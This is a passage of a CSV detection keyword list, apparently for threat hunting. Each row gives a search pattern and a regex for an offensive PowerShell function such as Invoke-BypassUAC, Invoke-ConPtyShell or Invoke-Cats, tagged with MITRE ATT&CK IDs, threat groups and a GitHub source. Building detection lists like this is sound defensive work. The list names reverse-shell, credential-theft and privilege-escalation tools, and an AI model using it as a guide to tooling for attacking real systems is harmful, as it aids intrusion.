- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Invoke-Bof.ps1*",".{0,1000}Invoke\-Bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Invoke-BruteAvailableLogons*",".{0,1000}Invoke\-BruteAvailableLogons.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*Invoke-BruteClientIDAccess*",".{0,1000}Invoke\-BruteClientIDAccess.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - 
T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Test different client_id's against MSGraph to determine permissions","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-BruteForce*",".{0,1000}Invoke\-BruteForce.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-BruteLogonAccount*",".{0,1000}Invoke\-BruteLogonAccount.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*Invoke-BruteLogonList*",".{0,1000}Invoke\-BruteLogonList.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*Invoke-BSOD*",".{0,1000}Invoke\-BSOD.{0,1000}","offensive_tool_keyword","Invoke-BSOD","A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. 
Also enumeartes Windows crash dump settings.","T1561 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/peewpw/Invoke-BSOD","1","0","N/A","N/A","3","276","73","2018-04-03T13:36:45Z","2018-03-30T14:20:10Z" "*Invoke-BuildAnonymousSMBServer -*",".{0,1000}Invoke\-BuildAnonymousSMBServer\s\-.{0,1000}","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","0","N/A","6","3","225","42","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" "*Invoke-BuildAnonymousSMBServer.ps1*",".{0,1000}Invoke\-BuildAnonymousSMBServer\.ps1.{0,1000}","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","1","N/A","6","3","225","42","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" "*Invoke-BypassUAC*",".{0,1000}Invoke\-BypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-BypassUAC*",".{0,1000}Invoke\-BypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-CallbackIEX*",".{0,1000}Invoke\-CallbackIEX.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Carbuncle*",".{0,1000}Invoke\-Carbuncle.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Cats -pwds*",".{0,1000}Invoke\-Cats\s\-pwds.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*Invoke-Cats.ps1*",".{0,1000}Invoke\-Cats\.ps1.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*Invoke-CcmNaaCredentialsCheck*",".{0,1000}Invoke\-CcmNaaCredentialsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Certify*",".{0,1000}Invoke\-Certify.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Certify*",".{0,1000}Invoke\-Certify.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-CheckAccess*",".{0,1000}Invoke\-CheckAccess.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation 
tools","https://github.com/dafthack/GraphRunner","1","0","Check if tokens are valid","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*invokechecklocaladminaccess*",".{0,1000}invokechecklocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-CheckLocalAdminAccess*",".{0,1000}Invoke\-CheckLocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-CheckLocalAdminAccess*",".{0,1000}Invoke\-CheckLocalAdminAccess.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-checklocaladminaccess*",".{0,1000}invoke\-checklocaladminaccess.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*Invoke-CleverSpray*",".{0,1000}Invoke\-CleverSpray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*Invoke-CleverSpray.ps1*",".{0,1000}Invoke\-CleverSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*Invoke-ClipboardMonitor*",".{0,1000}Invoke\-ClipboardMonitor.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 
WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-CMLootDownload*",".{0,1000}Invoke\-CMLootDownload.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*Invoke-CMLootExtract*",".{0,1000}Invoke\-CMLootExtract.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*Invoke-CMLootHunt *",".{0,1000}Invoke\-CMLootHunt\s.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*Invoke-CMLootInventory*",".{0,1000}Invoke\-CMLootInventory.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*Invoke-ConPtyShell *",".{0,1000}Invoke\-ConPtyShell\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*Invoke-ConPtyShell.ps1*",".{0,1000}Invoke\-ConPtyShell\.ps1.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*Invoke-ConPtyShell.ps1*",".{0,1000}Invoke\-ConPtyShell\.ps1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Invoke-CreateRemoteThread*",".{0,1000}Invoke\-CreateRemoteThread.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialFilesCheck*",".{0,1000}Invoke\-CredentialFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - 
T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-CredentialFilesCheck*",".{0,1000}Invoke\-CredentialFilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-CredentialGuardCheck*",".{0,1000}Invoke\-CredentialGuardCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 